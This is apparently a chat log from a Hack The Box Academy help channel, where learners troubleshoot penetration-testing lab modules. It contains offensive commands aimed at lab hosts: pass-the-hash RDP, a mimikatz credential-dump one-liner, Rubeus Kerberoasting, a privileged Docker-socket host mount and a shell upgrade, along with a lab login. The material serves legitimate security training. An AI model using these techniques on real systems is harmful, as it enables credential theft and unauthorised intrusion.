Hello, I have been trying to kerberoast for 2 days now and the LDAP query fails with all Sliver tools, GetUserSPNs, and Rubeus. I have switched VPN and it also did not help. Did anyone have this issue?
impacket, netexec etc
connect via rdp with the flag /pth:<hash> or impacket-psexec
But from linux machine the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL server is not reachable.
So I do pivoting and then perform pass the hash?
pivot
maybe include the error
can i get some help with this error?
proxychains: can't load process 'xfreedrdp'. (hint: it's probably a typo): No such file or directory
its for Pivoting, Tunneling and Portforwarding>Dynamic Port Forwarding w/ SSH & SOCKS Tunneling>Q2
there might be a hint in the error
freedrdp
This is not my screenshot, I turned my PC off, but my command was
```
Rubeus kerberoast /nowrap /user:alice /format:hashcat
```
But the error is the same: LDAP query failed
i need new glasses lol
The username or password is incorrect
ok so I'm having the same problem with that question - port 3389 is shut down, it doesn't appear RDP is running on any other obscure ports
it is most likely open, as they give the username and password to connect. Hard to say much more from the info you gave. Maybe double-check your previous steps
can you nmap the windows target via proxychains?
are you sure your ip is correct?
no, actually I'm a bit confused, here's the ifconfig from the ubuntu machine - the question calls for a different IP
I tried with crackmapexec and evil-winrm with a chisel proxy, but both of these commands give a socket timeout error:
Will try this one tomorrow
You mean instead of /rc4:{hash} do /pth:{hash}?
ok so you see, ens224 is the interface on 172.16.5.0/23 on the linux host
This interface is on the same network as the windows host you want at 172.16.5.19
So you pivot on that interface. Redo the steps from the course
anyone facing problems with the XXE CDATA data exfiltration method from Web Attacks?! I copied and pasted the exact same commands as shown and checked several times but it's still not working
without knowing how you have set up the pivot it's hard to say, make sure the ip is correct
i mean replace the password with the hash
```
xfreerdp /u:user /pth:<hash> /d:<domain> /v:<ip>
```
thanks, i think i get it now
once you are connected, beware with evil-winrm and mimikatz: you have to put the command on one line:
```
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
```
does anyone know if I'm supposed to be able to access the AutomateDCAdmin from the vfrank rdp connection in the Skills Assessment for Pivoting, Tunneling, and Port Forwarding ? its the last question
i don't recall anything about AutomateDCAdmin
Hello! I'm having trouble with the password cracking module. I'm told to crack this hash 7106812752615cdfe427e01b98cd4083
After doing hashid, I get
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
And in the hints I'm told to use one of the rules that come with hashcat
I tried a few, but none of my attempts were successful
I tried the MD5 and NTLM hashes first, with rockyou and the first two predefined rules in hashcat, but I wasn't lucky
I searched on the internet and found the following command
"hashcat -a 0 -m 1000 -g 1000 hashNTLM /usr/share/wordlists/rockyou.txt"
but it didn't work, since -g 1000 is generating random rules
Can anybody point me in the right direction please? Thank you!!
the last question was: "Submit the contents of C:\Flag.txt located on the Domain Controller." and I see a network drive but I do not have access to it from vfrank's machine. I might be missing something or I have to further enumerate from his machine. I tried using pypykatz again to dump lsass creds but none of them gave me any users to further enumerate
you are on the right track with the drive
use rockyou + a built in rule
Yes, but is there any way to determine which rule I should use or do I have to try all of them? (Thank you btw)
best64 should work
or one of the rules you have used in the previous section
Didn't work... 😢
Also tried combinator
And rockyou3000 takes a long time
Ok, I got it, it was the 3rd rule.
Thank you for your help!!
Iirc yes
Iirc vf* is the last step
There are other attack vectors for MSSQL cf "Attacking SQL Databases" chapter
sorry, does that mean to remote in to vf*?
I'm inside vf*'s machine with rdp and it says the network drive is disconnected, I can send a picture, not sure if that's allowed or not
sent it in DM so I do not put any answers here
I've tried stealing the svc account hash as well.
I've enumerated all non-default DBs.
Also got SMB access for f...., j..., s...., mss.....
I know that there is a linked server but I haven't been able to progress with that.
I'm not accepting dms atm
It's a combination of impersonation and linked servers
it shows that the vf* user's network drive AutomateDCAdmin is disconnected
Reset the target and get to it again. I don't recall needing to do anything extra
will try
how are you trying to mount it?
Don't put the IP\ part also at this point it's spoiling
oh wait wat? i thought u can just access it
You should be able to
i see in my notes i mounted it via evil-winrm
What?
You don't need to mount it
Lol
It's automatically mounted (or should be) on that target
I didn't mount at all when I did it
you are certainly right, i lost trace of the end of the rdp attack chain, so maybe i got it in rdp session.... then i did the box without rdp and i have more notes on that.. well...
It's why I said restart the target
yeah, it just says it fails to connect to the network drive even after I reset the box
strange
Wait 5 minutes before connecting
Hi everyone! The whole streak thing in academy is neat, but I was wondering... are there any benefits to having a streak?
Like I love the encouraging messages
Or change vpn regions, respawn target, try again
Not atm
ah, I see
is it your command?
net use Z: \\<ip>\C$ /user:'INLANEFREIGHT.LOCAL\v*****' '*************' /p:yes
no i just went to the file explorer since I have rdp
Weird I didn't have to do that
and it says disconnected
It should just be mounted by default, you shouldn't have to
I'll just wait 5 min before attempting this time so it can load everything
ah!!! I found in my notes the drive is there after connecting via rdp
Yeah it's always there
Sounds like the env being dumb
Hey! I'm having issues with zip2john, when I try to find the hash of a 7z file I get Did not find End Of Central Directory.
Also suggestion, log out [via the start menu] instead
Because 7z is a different format iirc
There should be a 7z2john
What academy module is this related to?
Password cracking
7z2john should be a tool
Yes, I found it, thanks (I'm dumb sometimes)
It looks like you're using '' and not " (double quote vs 2 single quotes)
yeah, nothing seems to make it connect to the network drive, it always starts as "failed to connect to network device" when I rdp in
It's weird
Yup I am.. have tried a few options now.. '...', '"..."', ""...""
Use C:\ maybe?
Also spoiling dude
At least cut out the [linked server] or something
Also you don't need to use open... if you have xp_cmdshell
are you inside an rdp session? I noted I used exactly the procedure in the course material to retrieve the files
Sqlcmd
It shouldn't
As long as you're connected to the mssql client it's fine
heya, back again with another (likely stupid) question
currently stuck on the third question of Information Gathering - Web Edition > Skill Assessment, question 3 (What is the API key in the hidden admin directory that you have discovered on the target system?)
||using gobuster dir on this yielded no results except for /index.html||
||with gobuster (vhost) I was able to find w*.inlanefreight.htb:36964||
||which is slightly different from the one without w*, but just in the text it displays||
||I tried using gobuster (dir) to find directories of w*.inlanefreight.htb:36964: $ gobuster dir -H "Host: w.inlanefreight.htb:36964" -u http://inlanefreight.htb:36964 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ||
||but this yielded no results. Not quite sure where to go from here. Does anyone have some pointers? I'd prefer a hint over a solution, but a solution is also fine.||
yay! what was the issue?
~~my bad, i found ||w*.inlanefreight.htb|| with ||finalrecon, not gobuster|| ~~
never mind, I was right the first time, it was with ||gobuster||
also, question 4 is
After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.
I'm confused though, as I don't see anywhere for the crawler to go. The whole page is just:
`<!DOCTYPE html><html><head><title>inlanefreight</title></head><body><h1>Welcome to inlanefreight.htb</h1></body></html>`
and the ||w*|| version is just || <!DOCTYPE html><html><head><title>w*</title></head><body><h1>Welcome to w*</h1></body></html> ||
I don't know why I wasn't using xp_cmdshell.
When I realized, I also realized that something had to be enabled (which I was able to, through my admin perms)
how did you find the password? Since I can't access the network drive I might as well try other methods now
Don't include the subdomains (even in spoiler text)
Further subdomains
guys, with kerbrute, I have a list with 48k names which I want to test, and when I run it, I get that 50 USERS EXIST. OK, that's good. How can I have these 50 valid usernames output to a users.txt, with only the names on each line? Does kerbrute have a built-in function that does this?
@hexed kestrel you can generally shorten things to first letter * i.e. w*.inlanefreight.htb
Spoiler text literally does nothing to mask
As anyone can click it
I don't know how to answer without spoiling too much. And since we are speaking in vague terms, I don't even know anymore if we are speaking about the same things :D
You'd use vf* password
I used his hash to rdp, because I couldn't break the password. Maybe I'll try other lists
you won't get it in a list
His password is in plain text
fair enough. will edit it
When you dump
and thanks will try that
General tip: if you can't find it, dig deeper
#Module: Introduction to Windows Evasion Techniques
Last question asks about signature version. Tried multiple cmdlets and version numbers presented (even those that don't make sense). Anyone DM?
@fathom pendant @wraith pelican yeah... overlooked something in the dump output
Hey! Need a little help again.
I'm unable to perform MIC cracking even though I've done exactly what the module says
I've extracted the hccapx file from the cap file with the cap2hccapx tool from hashcat-utils and then attempted to crack it with hashcat, but I get "no hashes loaded"
Any idea??
Thanks!!
I think that particular tool is weird and doesn't work properly
Any recommendation?
I haven't done that module so can't advise
ok, thanks anyway for your time!
Yeah, after several hours digging for a way in, it can easily be overlooked in all those lines! Glad you found it! Hey, maybe edit some of the stuff you posted as it could be spoilers here and there.
will do
In the Getting Started knowledge check right now, the question is "gain a foothold and submit the user.txt flag". I've been looking at exploits, but every time I try to do the exploit it says this, even though I logged into the admin page successfully with the credentials
Try a different exploit maybe?
Because one of the exploits doesn't require any authentication
Hello there
The question is about the foot printing module. There is a task to connect to a public folder on the target system and find the flag, but when I connect there is no flag, can you please direct me in the right direction?
Well it looks like there's a directory
Gonna have to navigate a bit my dude
is meterpreter like a shell? Will I need to run the reverse shell one-liner?
How do I connect to a directory in an SMB folder?
I'm confused about what meterpreter is, it didn't really get covered in the Getting Started module
Meterpreter is a type of shell for msfconsole
All you need to know is that once it connects, type shell and you're dropped into the shell env
okay, I'm in, and I've basically searched all dirs without finding a user.txt flag
spoke too soon
Also you might need to upgrade the shell with the python one-liner
python3 -c "import pty; pty.spawn('/bin/sh')"
Trying to find possible ways for privilege escalation right now, but when trying to transfer LinEnum over I'm getting this error
you can simply cd to that directory and do the command again
I forgot what the flag was to specify the output file location but you can check the help command
I've removed it from the permission-denied dir and added it to tmp and now I'm getting this error
I also tried /tmp/LinEnum.sh
What are you doing
what module?
Knowledge check on the getting started module
Privilege escalation to get root
Are you running the http.server in the directory LinEnum.sh is in?
Also linenum isn't required
that would explain why, I assumed http.server would serve all directories
Nope it's the current directory, and any subdirectories
ah makes sense
You should check what your user can (su)do
Check out gtfobins
No, you can run the /bin/php as root
Gtfobins will help you from here
gtfobins looks like a lot haha, but yes, I can run /bin/php as root
I may be stupid, but how will gtfobins help me here?
oh it's the bin folder right?
a binary is a bin folder
apologies for the stupid questions, I figured out what gtfobins is
and it's just given me the flag, appreciate the help
Hey, it's nice you found the answers to your question, there is a lot to figure out and you did it!
thank you, there's definitely a lot to uncover, I'm getting there step by step, I've realised my notes need to be more detailed than just commands
greetings, I'm on the Footprinting easy lab, trying the DNS server. I ran the dig commands, found subdomains and stuff, but no flag, and I don't know how to get any further
Still stuck?
@cunning quarry
thank you
include the module and section name, what you have tried and any errors thanks
I figured it out!
good job
which channel do I message in if I need help with a specific module and cannot find any help online?
community-help-zone?
this one 🙂
Yes, the channel you are in. Also check out #welcome to get yourself verified to get access to different channels
ok cool, thanks for the help, my question is kind of long.
I have a question on the Vulnerability Assessment module. It says that we need to start up Nessus and log into the GUI at https://<IP>:8834. OK, so I do that, but Nessus does not come pre-installed. No issue, I think, the module teaches us how to install it, so it probably wants me to do that. But when I install Nessus on my Parrot VM it says out of space. I need to resort to deleting my audio drivers and some of the password dictionaries that are a few hundred MB to clean up space.

So I was thinking, well, if HTB doesn't give each VM enough space for Nessus then I'm probably doing it wrong. Maybe I need to spawn in a VM and SSH to the spawned VM and do Nessus all from the CLI? I mean it will be harder but sure, I can try. So I SSH into the spawned VM with the provided "htb-student" and password "HTB@cademy_student!" and no, Nessus isn't there either.

So now I'm really confused. We can't install Nessus on the VM without deleting the pre-installed hacking tools HTB gives us. I also can't figure out why we need to spawn the other VM in the first place: the server we need to do a vuln scan on is 172.16.16.100, and the server we spawn is random every time. So why do we need to spawn the VM? I MUST be doing something wrong. I know this is important.
"The Nessus credentials are: htb-student:HTB@cademy_student!. You may also use these credentials to SSH into the target VM to configure Nessus."
but I cant figure out how this plays a role into setting up nessus? Its probably very simple and obvious, but I havent seen another person online have this question, so it makes me think its a very simple/ stupid question. thank you very much for the help
oh my goodness a wall of text
nessus is running on the spawned target, not pwnbox
you should also ssh into the IP provided. You can spawn the target above the questions
yeah, sorry for the long-winded msg, I just wanted to make sure I was getting the whole picture across. Probably TMI on my part
when I checked the spawned target and did a find / -name 'nessus', nothing came back. I also did a whereis nessus, same results, no hits for nessus, so I came to the conclusion that Nessus wasn't on the spawned VM?
go to the Nessus Skills Assessment section and you will be able to spawn the target with nessus running
OHHHH, that was my issue, I was ssh'ing into the spawned server and downloading Nessus on my Parrot VM. I never tried https://spawnedtarget:8834/
let me try that
yall are so gosh darn smart! thank you so much for the help!!! worked like a charm 
Hi, I am stuck at Linux PE, Kernel Exploitation. I cannot seem to find the correct exploit to gain root shell despite using Linux Exploit Suggester. Is there anyone who can help to nudge me?
you can use the same exploit as the section, but check the note on using a more recent version
Hi, OSINT: CORPORATE RECON [Domain Structure] In which country is the Chief Financial Officer (CFO) located? The answer is Germany. I knew the problem and solved it. But I don’t know the answer to your other question. While solving another problem, I found out through a site called Zoomeye that the parent company of inlanefreight.com is digitalocean LLC, and I don’t know how to solve it after that. Please let me know… ㅠ And I don’t know how to format the last question
I am stuck on the skills assessment for Information Gathering - Web Edition question 3. I have spent days on it and I am sure I have tried everything at this stage, but cannot find any directories. I have used ffuf, gobuster, Zap fuzzer, basically every tool and more from the unit
Hi All! Hope everyone is ok!
Considering building my own home lab... still watching lots of YT videos and stuff... which option would be better, a physical lab or a cloud one? In terms of performance, pricing and also how good it might look in terms of project documentation?
Thank you!!
so maybe it is not a tool issue? if you stick to the tools in the course it works fine. Read again the assessment brief, there are big hints on what you have to look for.
Is this a good place to ask a question for help on the 'Footprinting' module in the academy?
Hello guys, can anyone help me from cyber bullying
Someone is faking my Instagram id , please someone help me
Is anyone familiar with the hackthebox osint module
Anyone able to point me in the right direction with this question? CDSA -> Intermediate Network Traffic Analysis -> Detecting Network Abnormalities -> TCP Connection Resets and Hijacking.
Scrolling through the Telnet packets, I see some 'unames' but none of them worked. I also see something in the SS but I'm unsure if there is a username in it
I cant seem to find a more recent version. Any more clues or CVE for reference?
find vhost using gobuster
I'm stuck on the last question of the DNS section of the Footprinting module. I keep getting this response when I try to initiate dnsenum.
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://inlanefreight.htb:33175/ --append-domain
===============================================================
Starting gobuster in VHOST enumeration mode
Progress: 4989 / 4990 (99.98%)
Finished
I don't know what I have done wrong
use another wordlist
subdomains-top1million-11000.txt
I just tried the subdomains wordlist it gives me the same response
Ok so the syntax is ok?
Use the top1million-11000 one
you are kinda missing the point: the goal of the section is more to find the exploit than to run it. Google search with the info you got about the host: kernel version and OS version
yeah
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux
When performing ExtraSids attack, we move from child domain to parent domain. And all we need to perform this is
- KRBTGT hash for child domain
- SID for child domain
- Name of target user in the child domain
- FQDN of child domain
- SID of Enterprise Admins group for parent domain
The section shows that we can use lookupsid.py to get the domain sid of the parent domain. But it requires authentication and we are working on the premise that we do not have any access on parent domain yet. So, how do we find the SID of Enterprise Admins group for the parent domain?
you can still use the credentials from the child domain, it's trusted by the parent domain
Thanks!
It's just hosted on a digital ocean droplet
I'm not sure where it's hosted and I'm not sure how to format my answer...
I'm just informing you that the parent company isn't Digital Ocean
Inlanefreight is a fictional company made by HTB
I haven't done the module myself
Unbelievable I have spent so long on this and just didn't use the biggest list. Thanks
If the child domain user is already trusted by the parent domain, then why is there a need to perform the attack in the first place?🤔
The examples mostly use the big list
inlanfreight Could you please tell me a site where I can check the Germany coordinates?
to escalate from a low priv user to DA
Will definitely not make that mistake again
No idea dude I haven't done this module, maybe something you missed
thank you for replying to me
Set your browser to English and then you should find what you are looking for with Google
thank you. I'll try my best
Once I figured out the language setting thing, the module was relatively simple
it's always language barrier.
Thank you ㅠㅠ
Please someone help my friend
Why Google displays other GPS data because your browser is set to language X instead of y is a mystery to me
that also makes me wonder. "why" 🤔
add the hostname, domain name and fqdn of the target domain controller to your hosts file
also make sure your ticket works, try with psexec first
It took me a long time to find out back then
What is it about?
Which module do you need help with?
I have tried psexec and it works.
It is already present in the hosts file
but why does it show though? 🤔
idk
😄
if psexec works secretsdump should also work, they're both using the same codebase to authenticate to the domain
use the same line for each ip
psexec was working earlier but its not anymore
I recreated the ccache file and its working now.
😕
🤔
We cannot help you with Instagram accounts. Contact Instagram support.
for impacket you can just @fqdn -flags and let it get the info from the ticket itself, no need to specify the user or domain
Turns out I should use -target-ip instead of -dc-ip
The sections themselves are so confusing. I can only imagine how much more difficult the Skills Assessments are going to be 🤞
you'll get the hang of it when you do more, the impacket suite is very versatile
also spoilers here, you might want to remove it
yeah that's a big piece and at the same time i found it to be quite the nicest part of the course.
Greetings, I am doing the module "INTRODUCTION TO WINDOWS EVASION TECHNIQUES", the "Microsoft Defender Antivirus" section
And I have a very odd question, the question from this section says " What is the version of the antivirus signatures which are installed?", do I understand correctly that when I use Get-MpComputerStatus I should see the answer as "AntivirusSignatureVersion"?
(Asking this because for some reason this answer doesn't work, maybe someone had the same issue)
@jolly yacht instead of posting potential spoilers, please ask for assistance with the module, and take it to DM. Thanks
Anything above Tier 0 you shouldn't be sharing solutions, partial or otherwise in chat like that.
..and that was a mighty wall of text 😅
oh, I am really sorry for that. I'll follow that from now on. I'm confused about that code and don't know what to do, that's why I asked for help
No problem, yeah I understand - best way to get advice would be to mention the module / section you're struggling with, and possibly vaguely describe your problem. Someone may reach out in DM to give some guidance.
okay 👍
Hey, I was confused about the Flow Control section problem in the Intro to Bash Scripting module. I hope someone can give me your insight on that and help my learning process. Thank you.
use wc -c
Could anybody assist on this question?
Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.
I thought since it is 16 bytes, and we are given 12 bytes, and told to use 00 as arbitrary bytes, it would need 4 bytes of 00 to be ||AABBCCDDEEFF00000000|| , then changing the value of the last byte to the length of the padding, 4, it would be ||AABBCCDDEEFF00000003||
Am I doing something wrong?
ah i got it.. nvm lol counting bytes incorrectly xD
I'm working on AD Enumeration & Attacks - Skills Assessment Part I and am on the last question. I was able to ||DCsync|| and grabbed hashes for all users. However I'm unable to connect to DC01 to get the final flag. It says the user ||tpetty|| doesn't have perms, but I don't know what other user I would be expected to use?
If you have all the hashes what other users could you use?
Hello
please can somebody help me with this question 'What is the version of the antivirus signatures which are installed?' I tried all the commands, I put the AntivirusSignatureVersion but it doesn't work
Thanks
Well, there are 3000 users...
Yeah and 1 of those 3k users is really special and important that you'll find in every environment
But if you dumped the domain, which user has the most privileges?
admin didn't work for me either
They give you the command in the module, make sure to copy the whole string including the _
How did you try to login to the environment with the admin creds?
no modules have _
no modules have _
nvm, ignore me, they changed the question/answer
Is it likely that the socks5 default binding will cause me trouble? Doing the pivoting module.
Since it also routes localhost traffic
if I'm not mistaken, you have to choose one, can't do both socks4 and 5 at the same time
admin for ad enum works for me
... Okay I finally got it. I must have messed up something previously
Nothing like spending a ton of time because of a typo...... lol
Thanks
Yeah I think that was what caused me errors
Is it possible to turn off all the noisy proxychains messages?
-q i think, check help if not that
msf also can interact with proxychains directly by setting the proxy, you don't need to do proxychains msf
Module: Linux Privilege Escalation
Chapter: Docker
I don't really get the "Docker Sockets" section. I tried to reproduce it, but I can't create a new container. What are the requirements?
your command is wrong, review that part of the section, you have a couple of flags wrong
So it can be done?
Hello everyone, I have a question about where to get the dehashed.py of this module (https://academy.hackthebox.com/module/113/section/1214). I searched on GitHub and found that it seems that it is not the same thing. The link given in the textbook (http://dehashed.com/) seems a little different.
Have you been compromised? DeHashed provides free deep-web scans and protection against credential leaks. A modern personal asset search engine created for security analysts, journalists, security companies, and everyday people to help secure accounts and provide insight on compromised assets. Free breach alerts & breach notifications.
Yes, I just did it as this section was updated since I last completed the module
Hello,
For the module Vulnerability Assessment - Nessus Skills Assessment
The question:
**What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?**
I don't understand the concrete meaning of the question, can you give me a hint?
oh it's not possible. I found the answer. It's really abused
if I had to take a guess https://gist.github.com/darkerego/536d30f814831127081e6d193c6a2c3d
but it is not important for the material, it's a scenario to think of so the creds were not magically available.
who knows what should appear next? something that will help you find a record in a subdomain. I haven't received the required subdomains for about 80 minutes
hello guys is there any discount code for HTB Academy Silver Annual
no?
remove your image as it contains spoilers. the question asks for the contents of the record, so do some digging and you'll have your answer
I checked all these subdomains, added them to the hosts, but did not find any entries
sounds like your command was wrong
In the end it was just because the container didn't start just after creating it, which can be solved by adding an extra flag -t cf
https://stackoverflow.com/questions/25775266/how-to-keep-docker-container-running-after-starting-services#answer-36872226
docker -H unix:///var/run/docker.sock run -td --privileged -v /:/tmp/hostsystem ubuntu <- works
This is because docker ps list running containers, but we can see all containers with docker ps -a
So I'm not sure if the commands shown in docker sockets are correct? You can't create a container that isn't running and have it displayed as running (up) just after
i used dig axfr, dig any
you need to specify an ip with @<IP>
you're creating a new container from the image - there were no running containers when you first got on
again with the spoiler. your dig command is correct or was i guess you restarted the instance (ip change) but do it for all of the subs you have gathered
I'm talking about this, hope it's clear enough
Maybe it's because the image is different and keeps the container up without the need for a -t flag?
yes I found it, thanks
I see what you are getting at now, yes those images are different, probably overlooked by the author, same goes for the last step it will close once you exit out of the terminal
Might be offtopic, but I'm having issues with VPN in the HTB Academy, I connected to HTB Academy network using openvpn but when I spawn target and when I paste the IP:PORT it's just won't connect to it, someone had same issues on their own lab machine?
when you receive an IP:PORT address it does not go through the VPN. The VPN is needed when you get the webpage element with the possibility to change VPN settings; generally, when you receive just an IP without a port, you need the VPN
I think you didn't get it, or I didn't get the point. Because to complete the task which is given by htb academy you should connect to their network using their VPN, I connected to it and pasted the IP:PORT which were provided
sorry qui3t, clicked the wrong reply button
I'm curious, could you explain how this is working? What does that do? this is when you set up the vpn via network manager and not via command line?
i assumed he had a public address for a web page / or the web page he was trying to load had external assets, when you use the network manager it routes all the traffic over the vpn. doing this only the routeable traffic for the vpn will go over, everything else will be from your other interfaces.
Thanks @shut quest. I'm wondering... the only routable traffic using htb vpn is still only those private IPs? or with that method you also send the IP:PORT type of target through it?
just the private ips. if the page needs to load a google font it will do it from your eth0
i must be slower than usual today and i don't want to be picky, but then i miss the point of doing that. It is just, let say, a convenience to set it up via network-manager, to not have a terminal pane busy with vpn or something?
different strokes? I don't have to remember where I keep my configs and which one is current, also no need for a terminal. maybe crossover from Windows habits? click button, receive VPN ¯\_(ツ)_/¯
haha ok yeah totally... thanks i get it. Sorry for being inquisitive : D
Well… I’m stuck in File Inclusion > File Inclusion Prevention
I believe I have edited the php.ini file, and placed a php webshell in the hinted directory, but I don’t seem to be able to curl this file. I’m not seeing anything in the error.log file.
hey, I don't understand why they used the while loop in this script (Intro to Bash Scripting module). I mean the script's functionality would be the same even if the while loop didn't exist, right? What's the point of the while loop here? If anyone knows, please share your insights, it might give me some clarity. Thank you.
So two things, did you restart apache? Did you go through the logs?
The while loop in this script is actually pretty clever - it's there to give each host multiple chances to respond. Without it, the script would just ping each host once and move on, which could miss hosts that are actually up but just didn't answer the first time. A host might not reply right away due to a brief hiccup. The loop keeps trying until it gets a response or decides the host is really down. It's like when you call someone and they don't pick up, so you try again a couple times before giving up. This makes the whole ping process more reliable and realistic for how networks actually behave in the real world.
I did.
I seem to be curling the wrong address. It’s saying “page not found”.
Sorry didn't read the last line. Double check that your path is correct.
Idk…
webshell?
Typo, but that’s the filename.
Try just http://IP/webshell.php
but even if the ping gets response code 0 (success) or something else (not success), the stat variable is going to decrement by 1, right? Which means stat is now 0 and the loop will stop, so whether the ping is received or not, the loop is going to execute only one time, right? Then what's the point of the loop, since removing the loop would also execute the statement one time, as the loop did?
you have url/index.html/var/www/html/weshell.php
Oh yeah lol I didn't notice that, and that kinda would make the loop redundant
This is the location.
so, you try to access http://url/page.html/directory/directory/another_page.html
try this, http://ip/webshell.php or http://ip:port/webshell.php
yeah, that part confuses me, so I thought maybe they included it just to show the working of the loop for learning purposes, or maybe there is some other reason behind it, that's why I asked. Thank you.
and i don't understand, do you want to access the webshell.php or do you want to include it?
hey guys could someone help with Nmap module please?